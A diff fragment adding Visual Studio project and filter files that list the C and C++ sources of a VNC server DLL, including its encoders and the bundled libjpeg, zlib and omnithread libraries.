<ClCompile Include="libjpeg\jcmarker.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcmaster.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcomapi.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcparam.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcphuff.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcprepct.c" />
|
||||||
|
<ClCompile Include="libjpeg\jcsample.c" />
|
||||||
|
<ClCompile Include="libjpeg\jctrans.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdapimin.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdapistd.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdatadst.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdatasrc.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdcoefct.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdcolor.c" />
|
||||||
|
<ClCompile Include="libjpeg\jddctmgr.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdhuff.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdinput.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdmainct.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdmarker.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdmaster.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdmerge.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdphuff.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdpostct.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdsample.c" />
|
||||||
|
<ClCompile Include="libjpeg\jdtrans.c" />
|
||||||
|
<ClCompile Include="libjpeg\jerror.c" />
|
||||||
|
<ClCompile Include="libjpeg\jfdctflt.c" />
|
||||||
|
<ClCompile Include="libjpeg\jfdctfst.c" />
|
||||||
|
<ClCompile Include="libjpeg\jfdctint.c" />
|
||||||
|
<ClCompile Include="libjpeg\jidctflt.c" />
|
||||||
|
<ClCompile Include="libjpeg\jidctfst.c" />
|
||||||
|
<ClCompile Include="libjpeg\jidctint.c" />
|
||||||
|
<ClCompile Include="libjpeg\jidctred.c" />
|
||||||
|
<ClCompile Include="libjpeg\jmemmgr.c" />
|
||||||
|
<ClCompile Include="libjpeg\jmemnobs.c" />
|
||||||
|
<ClCompile Include="libjpeg\jquant1.c" />
|
||||||
|
<ClCompile Include="libjpeg\jquant2.c" />
|
||||||
|
<ClCompile Include="libjpeg\jutils.c" />
|
||||||
|
<ClCompile Include="zlib\adler32.c" />
|
||||||
|
<ClCompile Include="zlib\compress.c" />
|
||||||
|
<ClCompile Include="zlib\crc32.c" />
|
||||||
|
<ClCompile Include="zlib\deflate.c" />
|
||||||
|
<ClCompile Include="zlib\infblock.c" />
|
||||||
|
<ClCompile Include="zlib\infcodes.c" />
|
||||||
|
<ClCompile Include="zlib\inffast.c" />
|
||||||
|
<ClCompile Include="zlib\inflate.c" />
|
||||||
|
<ClCompile Include="zlib\inftrees.c" />
|
||||||
|
<ClCompile Include="zlib\infutil.c" />
|
||||||
|
<ClCompile Include="zlib\maketree.c" />
|
||||||
|
<ClCompile Include="zlib\trees.c" />
|
||||||
|
<ClCompile Include="zlib\uncompr.c" />
|
||||||
|
<ClCompile Include="zlib\zutil.c" />
|
||||||
|
<ClCompile Include="d3des.c" />
|
||||||
|
<ClCompile Include="DynamicFn.cpp" />
|
||||||
|
<ClCompile Include="FileTransferItemInfo.cpp" />
|
||||||
|
<ClCompile Include="MinMax.cpp" />
|
||||||
|
<ClCompile Include="RectList.cpp" />
|
||||||
|
<ClCompile Include="stdhdrs.cpp" />
|
||||||
|
<ClCompile Include="tableinitcmtemplate.cpp">
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="tableinittctemplate.cpp">
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="tabletranstemplate.cpp">
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
|
||||||
|
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="translate.cpp" />
|
||||||
|
<ClCompile Include="TsSessions.cpp" />
|
||||||
|
<ClCompile Include="VideoDriver.cpp" />
|
||||||
|
<ClCompile Include="vncauth.c" />
|
||||||
|
<ClCompile Include="vncBuffer.cpp" />
|
||||||
|
<ClCompile Include="vncClient.cpp" />
|
||||||
|
<ClCompile Include="vncDesktop.cpp" />
|
||||||
|
<ClCompile Include="vncInstHandler.cpp" />
|
||||||
|
<ClCompile Include="vncKeymap.cpp" />
|
||||||
|
<ClCompile Include="vncRegion.cpp" />
|
||||||
|
<ClCompile Include="vncServer.cpp" />
|
||||||
|
<ClCompile Include="vncService.cpp" />
|
||||||
|
<ClCompile Include="vncSockConnect.cpp" />
|
||||||
|
<ClCompile Include="VSocket.cpp" />
|
||||||
|
<ClCompile Include="WallpaperUtils.cpp" />
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClInclude Include="omnithread\nt.h" />
|
||||||
|
<ClInclude Include="omnithread\omnithread.h" />
|
||||||
|
<ClInclude Include="common.h" />
|
||||||
|
<ClInclude Include="libjpeg\jchuff.h" />
|
||||||
|
<ClInclude Include="libjpeg\jconfig.h" />
|
||||||
|
<ClInclude Include="libjpeg\jdct.h" />
|
||||||
|
<ClInclude Include="libjpeg\jdhuff.h" />
|
||||||
|
<ClInclude Include="libjpeg\jerror.h" />
|
||||||
|
<ClInclude Include="libjpeg\jinclude.h" />
|
||||||
|
<ClInclude Include="libjpeg\jmemsys.h" />
|
||||||
|
<ClInclude Include="libjpeg\jmorecfg.h" />
|
||||||
|
<ClInclude Include="libjpeg\jpegint.h" />
|
||||||
|
<ClInclude Include="libjpeg\jpeglib.h" />
|
||||||
|
<ClInclude Include="libjpeg\jversion.h" />
|
||||||
|
<ClInclude Include="zlib\deflate.h" />
|
||||||
|
<ClInclude Include="zlib\infblock.h" />
|
||||||
|
<ClInclude Include="zlib\infcodes.h" />
|
||||||
|
<ClInclude Include="zlib\inffast.h" />
|
||||||
|
<ClInclude Include="zlib\inffixed.h" />
|
||||||
|
<ClInclude Include="zlib\inftrees.h" />
|
||||||
|
<ClInclude Include="zlib\infutil.h" />
|
||||||
|
<ClInclude Include="zlib\trees.h" />
|
||||||
|
<ClInclude Include="zlib\zconf.h" />
|
||||||
|
<ClInclude Include="zlib\zlib.h" />
|
||||||
|
<ClInclude Include="zlib\zutil.h" />
|
||||||
|
<ClInclude Include="AdministrationControls.h" />
|
||||||
|
<ClInclude Include="d3des.h" />
|
||||||
|
<ClInclude Include="DynamicFn.h" />
|
||||||
|
<ClInclude Include="FileTransferItemInfo.h" />
|
||||||
|
<ClInclude Include="IncomingConnectionsControls.h" />
|
||||||
|
<ClInclude Include="InputHandlingControls.h" />
|
||||||
|
<ClInclude Include="keysymdef.h" />
|
||||||
|
<ClInclude Include="MatchWindow.h" />
|
||||||
|
<ClInclude Include="MinMax.h" />
|
||||||
|
<ClInclude Include="PollControls.h" />
|
||||||
|
<ClInclude Include="QuerySettingsControls.h" />
|
||||||
|
<ClInclude Include="RectList.h" />
|
||||||
|
<ClInclude Include="resource.h" />
|
||||||
|
<ClInclude Include="rfb.h" />
|
||||||
|
<ClInclude Include="rfbproto.h" />
|
||||||
|
<ClInclude Include="SharedDesktopArea.h" />
|
||||||
|
<ClInclude Include="stdhdrs.h" />
|
||||||
|
<ClInclude Include="translate.h" />
|
||||||
|
<ClInclude Include="TsSessions.h" />
|
||||||
|
<ClInclude Include="VideoDriver.h" />
|
||||||
|
<ClInclude Include="vncAbout.h" />
|
||||||
|
<ClInclude Include="vncauth.h" />
|
||||||
|
<ClInclude Include="vncBuffer.h" />
|
||||||
|
<ClInclude Include="vncClient.h" />
|
||||||
|
<ClInclude Include="vncDesktop.h" />
|
||||||
|
<ClInclude Include="vncEncodeCoRRE.h" />
|
||||||
|
<ClInclude Include="vncEncodeHexT.h" />
|
||||||
|
<ClInclude Include="vncEncoder.h" />
|
||||||
|
<ClInclude Include="vncEncodeRRE.h" />
|
||||||
|
<ClInclude Include="vncEncodeTight.h" />
|
||||||
|
<ClInclude Include="vncEncodeZlib.h" />
|
||||||
|
<ClInclude Include="vncEncodeZlibHex.h" />
|
||||||
|
<ClInclude Include="vncInstHandler.h" />
|
||||||
|
<ClInclude Include="vncKeymap.h" />
|
||||||
|
<ClInclude Include="vncPasswd.h" />
|
||||||
|
<ClInclude Include="vncRegion.h" />
|
||||||
|
<ClInclude Include="vncServer.h" />
|
||||||
|
<ClInclude Include="vncService.h" />
|
||||||
|
<ClInclude Include="vncSockConnect.h" />
|
||||||
|
<ClInclude Include="VSocket.h" />
|
||||||
|
<ClInclude Include="VTypes.h" />
|
||||||
|
<ClInclude Include="WallpaperUtils.h" />
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<Text Include="README.TXT" />
|
||||||
|
</ItemGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||||
|
<ImportGroup Label="ExtensionTargets">
|
||||||
|
</ImportGroup>
|
||||||
|
</Project>
|
|
@ -0,0 +1,527 @@
|
||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<ItemGroup>
|
||||||
|
<Filter Include="Source Files">
|
||||||
|
<UniqueIdentifier>{804c711f-35c6-4aac-9b8a-9cf8b528de85}</UniqueIdentifier>
|
||||||
|
<Extensions>.cpp, .c</Extensions>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Source Files\encoder">
|
||||||
|
<UniqueIdentifier>{7847cf33-fe03-48ad-9a94-a8956821f343}</UniqueIdentifier>
|
||||||
|
<Extensions>.cpp, .c</Extensions>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Source Files\omnithread">
|
||||||
|
<UniqueIdentifier>{a328f948-40d7-4548-9451-66b620124477}</UniqueIdentifier>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Source Files\libjpeg">
|
||||||
|
<UniqueIdentifier>{cb642898-1056-43ee-828a-40004b207331}</UniqueIdentifier>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Source Files\zlib">
|
||||||
|
<UniqueIdentifier>{22b4b748-5baf-4a41-9ab0-ef1d45f215aa}</UniqueIdentifier>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Source Files\winvnc">
|
||||||
|
<UniqueIdentifier>{2a00b2f1-2b80-496f-ade2-3ac76578d435}</UniqueIdentifier>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Header Files">
|
||||||
|
<UniqueIdentifier>{c3a89192-29f8-4ebc-b443-1032d86966d6}</UniqueIdentifier>
|
||||||
|
<Extensions>.h</Extensions>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Header Files\libjpeg">
|
||||||
|
<UniqueIdentifier>{a545ae04-19cc-401a-bb0e-fd3d7aad0f60}</UniqueIdentifier>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Header Files\zlib">
|
||||||
|
<UniqueIdentifier>{525d33a4-2360-47f9-9e68-24f7d54d50cb}</UniqueIdentifier>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Header Files\winvnc">
|
||||||
|
<UniqueIdentifier>{e0e45b7e-7137-4fa7-acb3-9c57acce4c9c}</UniqueIdentifier>
|
||||||
|
</Filter>
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClCompile Include="vncdll.cpp">
|
||||||
|
<Filter>Source Files</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="vncEncodeCoRRE.cpp">
|
||||||
|
<Filter>Source Files\encoder</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="vncEncodeHexT.cpp">
|
||||||
|
<Filter>Source Files\encoder</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="vncEncoder.cpp">
|
||||||
|
<Filter>Source Files\encoder</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="vncEncodeRRE.cpp">
|
||||||
|
<Filter>Source Files\encoder</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="vncEncodeTight.cpp">
|
||||||
|
<Filter>Source Files\encoder</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="vncEncodeZlib.cpp">
|
||||||
|
<Filter>Source Files\encoder</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="vncEncodeZlibHex.cpp">
|
||||||
|
<Filter>Source Files\encoder</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="omnithread\nt.cpp">
|
||||||
|
<Filter>Source Files\omnithread</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jcapimin.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jcapistd.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jccoefct.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jccolor.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jcdctmgr.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jchuff.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jcinit.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jcmainct.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jcmarker.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jcmaster.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jcomapi.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jcparam.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jcphuff.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jcprepct.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jcsample.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jctrans.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jdapimin.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jdapistd.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jdatadst.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jdatasrc.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jdcoefct.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jdcolor.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jddctmgr.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jdhuff.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jdinput.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jdmainct.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jdmarker.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jdmaster.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jdmerge.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jdphuff.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jdpostct.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jdsample.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jdtrans.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jerror.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jfdctflt.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jfdctfst.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jfdctint.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jidctflt.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jidctfst.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jidctint.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jidctred.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jmemmgr.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jmemnobs.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jquant1.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jquant2.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="libjpeg\jutils.c">
|
||||||
|
<Filter>Source Files\libjpeg</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="zlib\adler32.c">
|
||||||
|
<Filter>Source Files\zlib</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="zlib\compress.c">
|
||||||
|
<Filter>Source Files\zlib</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="zlib\crc32.c">
|
||||||
|
<Filter>Source Files\zlib</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="zlib\deflate.c">
|
||||||
|
<Filter>Source Files\zlib</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="zlib\infblock.c">
|
||||||
|
<Filter>Source Files\zlib</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="zlib\infcodes.c">
|
||||||
|
<Filter>Source Files\zlib</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="zlib\inffast.c">
|
||||||
|
<Filter>Source Files\zlib</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="zlib\inflate.c">
|
||||||
|
<Filter>Source Files\zlib</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="zlib\inftrees.c">
|
||||||
|
<Filter>Source Files\zlib</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="zlib\infutil.c">
|
||||||
|
<Filter>Source Files\zlib</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="zlib\maketree.c">
|
||||||
|
<Filter>Source Files\zlib</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="zlib\trees.c">
|
||||||
|
<Filter>Source Files\zlib</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="zlib\uncompr.c">
|
||||||
|
<Filter>Source Files\zlib</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="zlib\zutil.c">
|
||||||
|
<Filter>Source Files\zlib</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="d3des.c">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="DynamicFn.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="FileTransferItemInfo.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="MinMax.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="RectList.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="stdhdrs.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="tableinitcmtemplate.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="tableinittctemplate.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="tabletranstemplate.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="translate.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="TsSessions.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="VideoDriver.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="vncauth.c">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="vncBuffer.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="vncClient.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="vncDesktop.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="vncInstHandler.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="vncKeymap.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="vncRegion.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="vncServer.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="vncService.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="vncSockConnect.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="VSocket.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="WallpaperUtils.cpp">
|
||||||
|
<Filter>Source Files\winvnc</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClInclude Include="omnithread\nt.h">
|
||||||
|
<Filter>Source Files\omnithread</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="omnithread\omnithread.h">
|
||||||
|
<Filter>Source Files\omnithread</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="common.h">
|
||||||
|
<Filter>Header Files</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="libjpeg\jchuff.h">
|
||||||
|
<Filter>Header Files\libjpeg</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="libjpeg\jconfig.h">
|
||||||
|
<Filter>Header Files\libjpeg</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="libjpeg\jdct.h">
|
||||||
|
<Filter>Header Files\libjpeg</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="libjpeg\jdhuff.h">
|
||||||
|
<Filter>Header Files\libjpeg</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="libjpeg\jerror.h">
|
||||||
|
<Filter>Header Files\libjpeg</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="libjpeg\jinclude.h">
|
||||||
|
<Filter>Header Files\libjpeg</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="libjpeg\jmemsys.h">
|
||||||
|
<Filter>Header Files\libjpeg</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="libjpeg\jmorecfg.h">
|
||||||
|
<Filter>Header Files\libjpeg</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="libjpeg\jpegint.h">
|
||||||
|
<Filter>Header Files\libjpeg</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="libjpeg\jpeglib.h">
|
||||||
|
<Filter>Header Files\libjpeg</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="libjpeg\jversion.h">
|
||||||
|
<Filter>Header Files\libjpeg</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="zlib\deflate.h">
|
||||||
|
<Filter>Header Files\zlib</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="zlib\infblock.h">
|
||||||
|
<Filter>Header Files\zlib</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="zlib\infcodes.h">
|
||||||
|
<Filter>Header Files\zlib</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="zlib\inffast.h">
|
||||||
|
<Filter>Header Files\zlib</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="zlib\inffixed.h">
|
||||||
|
<Filter>Header Files\zlib</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="zlib\inftrees.h">
|
||||||
|
<Filter>Header Files\zlib</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="zlib\infutil.h">
|
||||||
|
<Filter>Header Files\zlib</Filter>
